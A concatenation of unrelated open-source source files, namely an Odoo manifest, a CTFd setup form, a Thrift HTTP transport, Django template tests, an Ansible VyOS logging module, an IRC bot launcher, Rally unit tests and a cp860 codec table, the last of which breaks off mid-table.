# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Test Module',
'category': 'Website',
'summary': 'Custom',
'version': '1.0',
'description': """
Test
""",
'author': 'OpenERP SA',
'depends': ['website'],
'data': [
'test.xml',
],
'installable': True,
'application': True,
}
| agpl-3.0 |
ajvpot/CTFd | CTFd/forms/setup.py | 2 | 2479 | from wtforms import (
FileField,
HiddenField,
PasswordField,
RadioField,
SelectField,
StringField,
TextAreaField,
)
from wtforms.fields.html5 import EmailField
from wtforms.validators import InputRequired
from CTFd.constants.themes import DEFAULT_THEME
from CTFd.forms import BaseForm
from CTFd.forms.fields import SubmitField
from CTFd.utils.config import get_themes
class SetupForm(BaseForm):
ctf_name = StringField(
"Event Name", description="The name of your CTF event/workshop"
)
ctf_description = TextAreaField(
"Event Description", description="Description for the CTF"
)
user_mode = RadioField(
"User Mode",
choices=[("teams", "Team Mode"), ("users", "User Mode")],
default="teams",
description="Controls whether users join together in teams to play (Team Mode) or play as themselves (User Mode)",
validators=[InputRequired()],
)
name = StringField(
"Admin Username",
description="Your username for the administration account",
validators=[InputRequired()],
)
email = EmailField(
"Admin Email",
description="Your email address for the administration account",
validators=[InputRequired()],
)
password = PasswordField(
"Admin Password",
description="Your password for the administration account",
validators=[InputRequired()],
)
ctf_logo = FileField(
"Logo",
description="Logo to use for the website instead of a CTF name. Used as the home page button.",
)
ctf_banner = FileField("Banner", description="Banner to use for the homepage.")
ctf_small_icon = FileField(
"Small Icon",
description="favicon used in user's browsers. Only PNGs accepted. Must be 32x32px.",
)
ctf_theme = SelectField(
"Theme",
description="CTFd Theme to use",
choices=list(zip(get_themes(), get_themes())),
default=DEFAULT_THEME,
validators=[InputRequired()],
)
theme_color = HiddenField(
"Theme Color",
description="Color used by theme to control aesthetics. Requires theme support. Optional.",
)
start = StringField(
"Start Time", description="Time when your CTF is scheduled to start. Optional."
)
end = StringField(
"End Time", description="Time when your CTF is scheduled to end. Optional."
)
submit = SubmitField("Finish")
| apache-2.0 |
pinterest/thrift | lib/py/src/transport/THttpClient.py | 20 | 6619 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from io import BytesIO
import os
import socket
import sys
import warnings
import base64
from six.moves import urllib
from six.moves import http_client
from .TTransport import TTransportBase
import six
class THttpClient(TTransportBase):
"""Http implementation of TTransport base."""
def __init__(self, uri_or_host, port=None, path=None):
"""THttpClient supports two different types constructor parameters.
THttpClient(host, port, path) - deprecated
THttpClient(uri)
Only the second supports https.
"""
if port is not None:
warnings.warn(
"Please use the THttpClient('http://host:port/path') syntax",
DeprecationWarning,
stacklevel=2)
self.host = uri_or_host
self.port = port
assert path
self.path = path
self.scheme = 'http'
else:
parsed = urllib.parse.urlparse(uri_or_host)
self.scheme = parsed.scheme
assert self.scheme in ('http', 'https')
if self.scheme == 'http':
self.port = parsed.port or http_client.HTTP_PORT
elif self.scheme == 'https':
self.port = parsed.port or http_client.HTTPS_PORT
self.host = parsed.hostname
self.path = parsed.path
if parsed.query:
self.path += '?%s' % parsed.query
try:
proxy = urllib.request.getproxies()[self.scheme]
except KeyError:
proxy = None
else:
if urllib.request.proxy_bypass(self.host):
proxy = None
if proxy:
parsed = urllib.parse.urlparse(proxy)
self.realhost = self.host
self.realport = self.port
self.host = parsed.hostname
self.port = parsed.port
self.proxy_auth = self.basic_proxy_auth_header(parsed)
else:
self.realhost = self.realport = self.proxy_auth = None
self.__wbuf = BytesIO()
self.__http = None
self.__http_response = None
self.__timeout = None
self.__custom_headers = None
@staticmethod
def basic_proxy_auth_header(proxy):
if proxy is None or not proxy.username:
return None
ap = "%s:%s" % (urllib.parse.unquote(proxy.username),
urllib.parse.unquote(proxy.password))
        # Encode/decode for Python 2/3 compatibility: b64encode() needs
        # bytes, and "Basic " + bytes would raise a TypeError on Python 3.
        cr = base64.b64encode(ap.encode('utf-8')).strip().decode('ascii')
        return "Basic " + cr
def using_proxy(self):
return self.realhost is not None
def open(self):
if self.scheme == 'http':
self.__http = http_client.HTTPConnection(self.host, self.port)
elif self.scheme == 'https':
self.__http = http_client.HTTPSConnection(self.host, self.port)
if self.using_proxy():
self.__http.set_tunnel(self.realhost, self.realport,
{"Proxy-Authorization": self.proxy_auth})
def close(self):
self.__http.close()
self.__http = None
self.__http_response = None
def isOpen(self):
return self.__http is not None
def setTimeout(self, ms):
if not hasattr(socket, 'getdefaulttimeout'):
raise NotImplementedError
if ms is None:
self.__timeout = None
else:
self.__timeout = ms / 1000.0
def setCustomHeaders(self, headers):
self.__custom_headers = headers
def read(self, sz):
return self.__http_response.read(sz)
def write(self, buf):
self.__wbuf.write(buf)
def __withTimeout(f):
def _f(*args, **kwargs):
orig_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(args[0].__timeout)
try:
result = f(*args, **kwargs)
finally:
socket.setdefaulttimeout(orig_timeout)
return result
return _f
def flush(self):
if self.isOpen():
self.close()
self.open()
# Pull data out of buffer
data = self.__wbuf.getvalue()
self.__wbuf = BytesIO()
# HTTP request
if self.using_proxy() and self.scheme == "http":
# need full URL of real host for HTTP proxy here (HTTPS uses CONNECT tunnel)
self.__http.putrequest('POST', "http://%s:%s%s" %
(self.realhost, self.realport, self.path))
else:
self.__http.putrequest('POST', self.path)
# Write headers
self.__http.putheader('Content-Type', 'application/x-thrift')
self.__http.putheader('Content-Length', str(len(data)))
if self.using_proxy() and self.scheme == "http" and self.proxy_auth is not None:
self.__http.putheader("Proxy-Authorization", self.proxy_auth)
if not self.__custom_headers or 'User-Agent' not in self.__custom_headers:
user_agent = 'Python/THttpClient'
script = os.path.basename(sys.argv[0])
if script:
user_agent = '%s (%s)' % (user_agent, urllib.parse.quote(script))
self.__http.putheader('User-Agent', user_agent)
if self.__custom_headers:
for key, val in six.iteritems(self.__custom_headers):
self.__http.putheader(key, val)
self.__http.endheaders()
# Write payload
self.__http.send(data)
# Get reply to flush the request
self.__http_response = self.__http.getresponse()
self.code = self.__http_response.status
self.message = self.__http_response.reason
self.headers = self.__http_response.msg
# Decorate if we know how to timeout
if hasattr(socket, 'getdefaulttimeout'):
flush = __withTimeout(flush)
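# Minimal usage sketch (annotation, not part of the upstream file; the URL is
# hypothetical):
#   transport = THttpClient('http://localhost:9090/thrift')
#   transport.setTimeout(5000)  # milliseconds
#   transport.open()
#   # ... wrap in a TBinaryProtocol and issue client calls ...
#   transport.close()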
| apache-2.0 |
barbuza/django | tests/template_tests/syntax_tests/test_verbatim.py | 521 | 1658 | from django.template import TemplateSyntaxError
from django.test import SimpleTestCase
from ..utils import setup
class VerbatimTagTests(SimpleTestCase):
@setup({'verbatim-tag01': '{% verbatim %}{{bare }}{% endverbatim %}'})
def test_verbatim_tag01(self):
output = self.engine.render_to_string('verbatim-tag01')
self.assertEqual(output, '{{bare }}')
@setup({'verbatim-tag02': '{% verbatim %}{% endif %}{% endverbatim %}'})
def test_verbatim_tag02(self):
output = self.engine.render_to_string('verbatim-tag02')
self.assertEqual(output, '{% endif %}')
@setup({'verbatim-tag03': '{% verbatim %}It\'s the {% verbatim %} tag{% endverbatim %}'})
def test_verbatim_tag03(self):
output = self.engine.render_to_string('verbatim-tag03')
self.assertEqual(output, 'It\'s the {% verbatim %} tag')
@setup({'verbatim-tag04': '{% verbatim %}{% verbatim %}{% endverbatim %}{% endverbatim %}'})
def test_verbatim_tag04(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('verbatim-tag04')
@setup({'verbatim-tag05': '{% verbatim %}{% endverbatim %}{% verbatim %}{% endverbatim %}'})
def test_verbatim_tag05(self):
output = self.engine.render_to_string('verbatim-tag05')
self.assertEqual(output, '')
@setup({'verbatim-tag06': '{% verbatim special %}'
'Don\'t {% endverbatim %} just yet{% endverbatim special %}'})
def test_verbatim_tag06(self):
output = self.engine.render_to_string('verbatim-tag06')
self.assertEqual(output, 'Don\'t {% endverbatim %} just yet')
| bsd-3-clause |
marratj/ansible | lib/ansible/modules/network/vyos/vyos_logging.py | 15 | 7782 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
#
# This file is part of Ansible by Red Hat
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: vyos_logging
version_added: "2.4"
author: "Trishna Guha (@trishnaguha)"
short_description: Manage logging on network devices
description:
- This module provides declarative management of logging
on Vyatta Vyos devices.
notes:
- Tested against VYOS 1.1.7
options:
dest:
description:
- Destination of the logs.
choices: ['console', 'file', 'global', 'host', 'user']
name:
description:
- If value of C(dest) is I(file) it indicates file-name,
for I(user) it indicates username and for I(host) indicates
the host name to be notified.
facility:
description:
- Set logging facility.
level:
description:
- Set logging severity levels.
aggregate:
description: List of logging definitions.
state:
description:
- State of the logging configuration.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: configure console logging
vyos_logging:
dest: console
facility: all
level: crit
- name: remove console logging configuration
vyos_logging:
dest: console
state: absent
- name: configure file logging
vyos_logging:
dest: file
name: test
facility: local3
level: err
- name: Add logging aggregate
vyos_logging:
aggregate:
- { dest: file, name: test1, facility: all, level: info }
- { dest: file, name: test2, facility: news, level: debug }
state: present
- name: Remove logging aggregate
vyos_logging:
aggregate:
- { dest: console, facility: all, level: info }
- { dest: console, facility: daemon, level: warning }
- { dest: file, name: test2, facility: news, level: debug }
state: absent
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set system syslog global facility all level notice
"""
import re
from copy import deepcopy
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network_common import remove_default_spec
from ansible.module_utils.vyos import get_config, load_config
from ansible.module_utils.vyos import vyos_argument_spec
def spec_to_commands(updates, module):
commands = list()
want, have = updates
for w in want:
dest = w['dest']
name = w['name']
facility = w['facility']
level = w['level']
state = w['state']
del w['state']
if state == 'absent' and w in have:
if w['name']:
commands.append('delete system syslog {0} {1} facility {2} level {3}'.format(
dest, name, facility, level))
else:
commands.append('delete system syslog {0} facility {1} level {2}'.format(
dest, facility, level))
elif state == 'present' and w not in have:
if w['name']:
commands.append('set system syslog {0} {1} facility {2} level {3}'.format(
dest, name, facility, level))
else:
commands.append('set system syslog {0} facility {1} level {2}'.format(
dest, facility, level))
return commands
def config_to_dict(module):
data = get_config(module)
obj = []
for line in data.split('\n'):
if line.startswith('set system syslog'):
match = re.search(r'set system syslog (\S+)', line, re.M)
dest = match.group(1)
if dest == 'host':
match = re.search(r'host (\S+)', line, re.M)
name = match.group(1)
elif dest == 'file':
match = re.search(r'file (\S+)', line, re.M)
name = match.group(1)
elif dest == 'user':
match = re.search(r'user (\S+)', line, re.M)
name = match.group(1)
else:
name = None
if 'facility' in line:
match = re.search(r'facility (\S+)', line, re.M)
facility = match.group(1)
if 'level' in line:
match = re.search(r'level (\S+)', line, re.M)
level = match.group(1).strip("'")
obj.append({'dest': dest,
'name': name,
'facility': facility,
'level': level})
return obj
def map_params_to_obj(module, required_if=None):
obj = []
aggregate = module.params.get('aggregate')
if aggregate:
for item in aggregate:
for key in item:
if item.get(key) is None:
item[key] = module.params[key]
module._check_required_if(required_if, item)
obj.append(item.copy())
else:
if module.params['dest'] not in ('host', 'file', 'user'):
module.params['name'] = None
obj.append({
'dest': module.params['dest'],
'name': module.params['name'],
'facility': module.params['facility'],
'level': module.params['level'],
'state': module.params['state']
})
return obj
def main():
""" main entry point for module execution
"""
element_spec = dict(
dest=dict(type='str', choices=['console', 'file', 'global', 'host', 'user']),
name=dict(type='str'),
facility=dict(type='str'),
level=dict(type='str'),
state=dict(default='present', choices=['present', 'absent']),
)
aggregate_spec = deepcopy(element_spec)
# remove default in aggregate spec, to handle common arguments
remove_default_spec(aggregate_spec)
argument_spec = dict(
aggregate=dict(type='list', elements='dict', options=aggregate_spec),
)
argument_spec.update(element_spec)
argument_spec.update(vyos_argument_spec)
required_if = [('dest', 'host', ['name', 'facility', 'level']),
('dest', 'file', ['name', 'facility', 'level']),
('dest', 'user', ['name', 'facility', 'level']),
('dest', 'console', ['facility', 'level']),
('dest', 'global', ['facility', 'level'])]
module = AnsibleModule(argument_spec=argument_spec,
required_if=required_if,
supports_check_mode=True)
warnings = list()
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module, required_if=required_if)
have = config_to_dict(module)
commands = spec_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
load_config(module, commands, commit=commit)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
benhoff/vex | vexbot/adapters/irc/__main__.py | 2 | 3015 | import sys
import atexit
import signal
from vexbot._version import __version__ as version
from vexbot.adapters.irc import IrcInterface
"""
try:
pkg_resources.get_distribution('irc3')
except pkg_resources.DistributionNotFound:
_IRC3_INSTALLED = False
if _IRC3_INSTALLED:
import irc3
else:
pass
"""
import irc3
from irc3 import utils, config as irc3_config
def main(**kwargs):
"""
if not _IRC3_INSTALLED:
logging.error('vexbot_irc requires `irc3` to be installed. Please install '
'using `pip install irc3`')
sys.exit(1)
"""
    config = _from_argv(irc3.IrcBot, **kwargs)
if 'includes' not in config:
config['includes'] = []
message_plug = 'vexbot.adapters.irc.echo_to_message'
if message_plug not in config['includes']:
config['includes'].append(message_plug)
service_name = config.get('service_name', 'irc')
connection = config.get('connection', {})
interface = IrcInterface(service_name, irc_config=config, connection=connection)
interface.run()
sys.exit()
# NOTE: This code is from `irc3`
def _from_argv(cls, argv=None, **kwargs) -> dict:
prog = cls.server and 'irc3d' or 'irc3'
# TODO: Add in publish ports and all that jazz.
doc = """
Run an __main__.py instance from a config file
Usage: __main__.py [options] <config>...
Options:
-h, --help Display this help and exit
--version Output version information and exit
--logdir DIRECTORY Log directory to use instead of stderr
--logdate Show datetimes in console output
--host HOST Server name or ip
--port PORT Server port
-v,--verbose Increase verbosity
-r,--raw Show raw irc log on the console
-d,--debug Add some debug commands/utils
"""
import os
import docopt
args = argv or sys.argv[1:]
args = docopt.docopt(doc, args, version=version)
cfg = utils.parse_config(
cls.server and 'server' or 'bot', *args['<config>'])
cfg.update(
verbose=args['--verbose'],
debug=args['--debug'],
)
cfg.update(kwargs)
if args['--host']: # pragma: no cover
host = args['--host']
cfg['host'] = host
if host in ('127.0.0.1', 'localhost'):
cfg['ssl'] = False
if args['--port']: # pragma: no cover
cfg['port'] = args['--port']
if args['--logdir'] or 'logdir' in cfg:
logdir = os.path.expanduser(args['--logdir'] or cfg.get('logdir'))
cls.logging_config = irc3_config.get_file_config(logdir)
if args['--logdate']: # pragma: no cover
fmt = cls.logging_config['formatters']['console']
fmt['format'] = irc3_config.TIMESTAMPED_FMT
if args.get('--help-page'):  # pragma: no cover -- '--help-page' is not among the options in doc above, so this branch never fires here
for v in cls.logging_config['handlers'].values():
v['level'] = 'ERROR'
if args['--raw']:
cfg['raw'] = True
return cfg
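# A minimal usage sketch of the parsing above (hypothetical config path;
# needs docopt installed and an irc3-style config file on disk):
#
#     cfg = _from_argv(irc3.IrcBot, ['--host', '127.0.0.1', 'bot.ini'])
#     assert cfg['host'] == '127.0.0.1' and cfg['ssl'] is False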
if __name__ == '__main__':
main()
| gpl-3.0 |
gluke77/rally | tests/unit/plugins/openstack/context/not_for_production/test_tempest.py | 13 | 4489 | # Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from rally import exceptions
from rally.plugins.openstack.context.not_for_production import tempest
from rally.verification.tempest import tempest as tempest_verifier
from tests.unit import test
CONTEXT = "rally.plugins.openstack.context.not_for_production.tempest"
TEMPEST = "rally.verification.tempest.tempest"
class TempestContextTestCase(test.TestCase):
def setUp(self):
super(TempestContextTestCase, self).setUp()
task = mock.MagicMock()
task.task.deployment_uuid.return_value = "fake_uuid"
self.context = {"task": task}
@mock.patch(CONTEXT + ".os.mkdir")
@mock.patch(TEMPEST + ".Tempest.generate_config_file")
@mock.patch(TEMPEST + ".Tempest.is_configured", return_value=True)
@mock.patch(TEMPEST + ".Tempest.install")
@mock.patch(TEMPEST + ".Tempest.is_installed", return_value=True)
def test_setup(
self, mock_tempest_is_installed, mock_tempest_install,
mock_tempest_is_configured, mock_tempest_generate_config_file,
mock_mkdir):
benchmark = tempest.Tempest(self.context)
benchmark.setup()
self.assertEqual(0, mock_tempest_install.call_count)
self.assertEqual(0, mock_tempest_generate_config_file.call_count)
self.assertEqual("/dev/null", benchmark.verifier.log_file_raw)
@mock.patch(CONTEXT + ".os.mkdir")
@mock.patch(TEMPEST + ".Tempest.is_configured")
@mock.patch(TEMPEST + ".Tempest.is_installed", return_value=False)
@mock.patch(TEMPEST + ".Tempest.install")
def test_setup_failure_on_tempest_installation(
self, mock_tempest_install, mock_tempest_is_installed,
mock_tempest_is_configured, mock_mkdir):
mock_tempest_install.side_effect = (
tempest_verifier.TempestSetupFailure()
)
benchmark = tempest.Tempest(self.context)
self.assertRaises(exceptions.BenchmarkSetupFailure, benchmark.setup)
self.assertEqual(0, mock_tempest_is_configured.call_count)
@mock.patch(CONTEXT + ".os.mkdir")
@mock.patch(TEMPEST + ".Tempest.is_configured", return_value=False)
@mock.patch(TEMPEST + ".Tempest.is_installed", return_value=True)
@mock.patch(TEMPEST + ".Tempest.generate_config_file")
def test_setup_failure_on_tempest_configuration(
self, mock_tempest_generate_config_file, mock_tempest_is_installed,
mock_tempest_is_configured, mock_mkdir):
mock_tempest_generate_config_file.side_effect = (
exceptions.TempestConfigCreationFailure()
)
benchmark = tempest.Tempest(self.context)
self.assertRaises(exceptions.BenchmarkSetupFailure, benchmark.setup)
self.assertEqual(1, mock_tempest_is_configured.call_count)
@mock.patch(CONTEXT + ".os.mkdir")
@mock.patch(TEMPEST + ".Tempest.is_configured", return_value=False)
@mock.patch(TEMPEST + ".Tempest.is_installed", return_value=True)
@mock.patch(TEMPEST + ".Tempest.generate_config_file")
def test_setup_with_no_configuration(
self, mock_tempest_generate_config_file, mock_tempest_is_installed,
mock_tempest_is_configured, mock_mkdir):
benchmark = tempest.Tempest(self.context)
benchmark.setup()
self.assertEqual(1, mock_tempest_is_installed.call_count)
self.assertEqual("/dev/null", benchmark.verifier.log_file_raw)
self.assertEqual(1, mock_tempest_generate_config_file.call_count)
@mock.patch(CONTEXT + ".os.path.exists", return_value=True)
@mock.patch(CONTEXT + ".shutil")
def test_cleanup(self, mock_shutil, mock_exists):
benchmark = tempest.Tempest(self.context)
benchmark.verifier = mock.MagicMock()
benchmark.results_dir = "/tmp/path"
benchmark.cleanup()
mock_shutil.rmtree.assert_called_once_with("/tmp/path")
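# Note on the @mock.patch stacking used throughout this class: decorators
# apply bottom-up, so the patch closest to the test method arrives as the
# first mock argument. A minimal sketch of the same pattern:
#
#     @mock.patch(CONTEXT + ".os.path.exists")   # -> second argument
#     @mock.patch(CONTEXT + ".shutil")           # -> first argument
#     def test(self, mock_shutil, mock_exists):
#         ...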
| apache-2.0 |
blois/AndroidSDKCloneMin | ndk/prebuilt/linux-x86_64/lib/python2.7/encodings/cp860.py | 593 | 34937 | """ Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP860.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp860',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
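# A small sketch of the tables below in action (assuming this module can be
# imported directly as `cp860`; normally it is reached through the codec
# registry, e.g. u'...'.encode('cp860')):
#
#     encoded, _ = Codec().encode(u'A\xe7\xe3o')   # u'Ação'
#     assert encoded == 'A\x87\x84o'
#     decoded, _ = Codec().decode(encoded)
#     assert decoded == u'A\xe7\xe3o'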
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00e3, # LATIN SMALL LETTER A WITH TILDE
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00c1, # LATIN CAPITAL LETTER A WITH ACUTE
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00ca, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00cd, # LATIN CAPITAL LETTER I WITH ACUTE
0x008c: 0x00d4, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x008d: 0x00ec, # LATIN SMALL LETTER I WITH GRAVE
0x008e: 0x00c3, # LATIN CAPITAL LETTER A WITH TILDE
0x008f: 0x00c2, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00c0, # LATIN CAPITAL LETTER A WITH GRAVE
0x0092: 0x00c8, # LATIN CAPITAL LETTER E WITH GRAVE
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00f5, # LATIN SMALL LETTER O WITH TILDE
0x0095: 0x00f2, # LATIN SMALL LETTER O WITH GRAVE
0x0096: 0x00da, # LATIN CAPITAL LETTER U WITH ACUTE
0x0097: 0x00f9, # LATIN SMALL LETTER U WITH GRAVE
0x0098: 0x00cc, # LATIN CAPITAL LETTER I WITH GRAVE
0x0099: 0x00d5, # LATIN CAPITAL LETTER O WITH TILDE
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00a2, # CENT SIGN
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d9, # LATIN CAPITAL LETTER U WITH GRAVE
0x009e: 0x20a7, # PESETA SIGN
0x009f: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00a0: 0x00e1, # LATIN SMALL LETTER A WITH ACUTE
0x00a1: 0x00ed, # LATIN SMALL LETTER I WITH ACUTE
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00f1, # LATIN SMALL LETTER N WITH TILDE
0x00a5: 0x00d1, # LATIN CAPITAL LETTER N WITH TILDE
0x00a6: 0x00aa, # FEMININE ORDINAL INDICATOR
0x00a7: 0x00ba, # MASCULINE ORDINAL INDICATOR
0x00a8: 0x00bf, # INVERTED QUESTION MARK
0x00a9: 0x00d2, # LATIN CAPITAL LETTER O WITH GRAVE
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00a1, # INVERTED EXCLAMATION MARK
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03b1, # GREEK SMALL LETTER ALPHA
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x00e3: 0x03c0, # GREEK SMALL LETTER PI
0x00e4: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x00e5: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x03c4, # GREEK SMALL LETTER TAU
0x00e8: 0x03a6, # GREEK CAPITAL LETTER PHI
0x00e9: 0x0398, # GREEK CAPITAL LETTER THETA
